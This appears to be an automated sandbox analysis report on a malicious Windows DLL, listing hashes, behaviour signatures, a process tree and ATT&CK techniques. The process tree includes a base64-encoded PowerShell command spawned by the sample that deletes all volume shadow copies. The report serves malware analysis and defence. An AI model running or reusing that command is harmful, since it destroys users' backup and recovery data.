Analysis

  • max time kernel
    2s
  • max time network
    6s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-03-2024 16:54

General

  • Target

    d01b92a1d7e00f34549ee537989890699c7ac34c929ea381a4289e49e2d0e4c4.dll

  • Size

    164KB

  • MD5

    0801f10ec6451719bde73ad22de88d5a

  • SHA1

    9bf9b111da0fdba83ce65a883248a0ea9e26a455

  • SHA256

    d01b92a1d7e00f34549ee537989890699c7ac34c929ea381a4289e49e2d0e4c4

  • SHA512

    10311c679c46dfe31815c63df41e6a06f04b03ce2050b3065675fd973e7af27d52dcbea7df74c2baa92344a8b2533c5799508926825a3ea3671097544efedee0

  • SSDEEP

    1536:WvbSZWtDvM7wIjCEZQ5yyw1oDpP+pfICS4A++GbvF0qcX8opz25maL3SUtNDWyPB:1WhoCE3yw1oVj5DJtOicNDWEzZ9dckwK

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\d01b92a1d7e00f34549ee537989890699c7ac34c929ea381a4289e49e2d0e4c4.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\d01b92a1d7e00f34549ee537989890699c7ac34c929ea381a4289e49e2d0e4c4.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
          PID:1936
    • C:\Windows\system32\wbem\unsecapp.exe
      C:\Windows\system32\wbem\unsecapp.exe -Embedding
      1⤵
        PID:2956
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
          PID:2648

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        1
        T1012

        Peripheral Device Discovery

        1
        T1120

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1936-4-0x000000001B2C0000-0x000000001B5A2000-memory.dmp
          Filesize

          2.9MB

        • memory/1936-5-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
          Filesize

          32KB

        • memory/1936-6-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
          Filesize

          9.6MB

        • memory/1936-7-0x0000000002780000-0x0000000002800000-memory.dmp
          Filesize

          512KB

        • memory/1936-8-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
          Filesize

          9.6MB

        • memory/1936-9-0x0000000002780000-0x0000000002800000-memory.dmp
          Filesize

          512KB

        • memory/1936-10-0x0000000002780000-0x0000000002800000-memory.dmp
          Filesize

          512KB